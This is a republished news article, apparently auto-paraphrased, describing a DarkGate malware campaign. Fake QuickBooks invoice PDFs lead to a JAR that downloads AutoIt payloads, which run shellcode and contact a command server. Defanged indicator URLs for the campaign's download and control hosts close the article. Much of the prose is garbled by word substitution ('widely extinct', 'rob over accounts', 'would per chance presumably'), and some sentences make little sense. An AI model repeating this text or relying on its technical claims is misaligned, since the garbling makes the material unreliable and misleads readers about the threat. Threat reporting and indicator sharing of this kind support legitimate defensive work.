Darkgate Malware Weaponizing XLSX, HTML, & PDF To Attack Windows Machines

by Esmeralda McKenzie
Darkgate Malware Weaponizing XLSX, HTML, & PDF To Attack Windows Machines

Darkgate Malware Weaponizing XLSX, HTML, & PDF To Attack Windows Machines

Darkgate Malware Weaponizing XLSX, HTML And PDF To Attack Windows Machines

Hackers most frequently aim XLSX, HTML, and PDF files as they’re widely extinct, and their trustable file formats additionally attract them.

This makes it more straightforward to lift them efficiently to recipients who would per chance presumably no longer be wide awake.

EHA

Forcepoint researchers recently asserted that the Darkgate malware is dispensed by job of phishing emails that win malicious attachments equivalent to XLSX, HTML, or pdf which rob over accounts and replicate themselves.

It is persistent within the sense that it’ll dart no longer well-known while endangering misplaced files, fraud, blackmail, and uncovered sensitive data.

Technical Diagnosis

Forcepoint X-Labs analyzed a up to date Darkgate campaign initiated via a phishing e mail containing a counterfeit Intuit Quickbooks invoice PDF.

It tricks customers into clicking a link to put in Java but as another redirects them to a geofenced URL that surreptitiously downloads the subsequent malware stage payload.

Attack%20Chain%20(Source%20 %20Forcepoint)
Attack Chain (Source – Forcepoint)

A malicious “would per chance presumably-document_[number].pdf” file prognosis demonstrates an invoice PDF with an embedded hyperlink in a noteworthy XObject image.

Clicking the link downloads a malicious .jar file. The associated URLs allotment patterns with those extinct by QakBot actors before, indicating capability connections.

Analyzing the malicious “.jar” file with JD-GUI uncovered a “.PNG” and an obfuscated “.class” file containing code to procure a “.ZIP” file to C:Downloads the usage of a curl.exe expose.

Upon downloading the ZIP, it leverages PowerShell’s increase-archive to extract the contents.

This class file can additionally procure and assign MSI files. Interior the ZIP, AutoIt3.exe and a compiled AutoIt script in .a3x layout win been extracted, which are then dash by the JAR by job of an obfuscated cmd expose.

Darkgate has extinct AutoIt in other locations, and this script was once compiled the usage of AutoIt 3.26+ with AU3!EA06 headers. Additional investigation is wished to resolve what this script does.

The operations BITXOR and BinaryToString() of AutoIt are subtle to grab. This instrument merges a noteworthy files coast into a local variable.

DLLSTRUCTCREATE() library characteristic enables bytes to be loaded into reminiscence after which abuse machine resources. Scripts kind shell code and be a part of with the server botnet remotely.

The Darkgate campaign deploys phishing emails pretending to be QuickBooks invoices to kind customers procure malicious JAR files containing directions for more payloads, equivalent to obfuscated AutoIt scripts.

These scripts dash shell code and allege to distant servers. The Darkgate campaign has well blended legit malware ways and ancient URL patterns in consequence demonstrating an improved persistent threat (APT).

IOCs

Preliminary Stage URLs:

  • afarm[.]accumulate/uvz2q
  • affixio[.]com/emh0c
  • affiliatebash[.]com/myu0f
  • afcmanager[.]accumulate/jxk6m
  • adventsales[.]co[.]uk/iuw8a
  • amikamobile[.]com/ayu4d
  • adztrk[.]com/ixi7r
  • aerospaceavenue[.]com/cnz8g
  • amishwoods[.]com/jwa4v

Second stage URL:

  • smbeckwithlaw[.]com/1[.]zip

C2:

  • ​kindupdates[.]com

Source credit : cybersecuritynews.com

Related Posts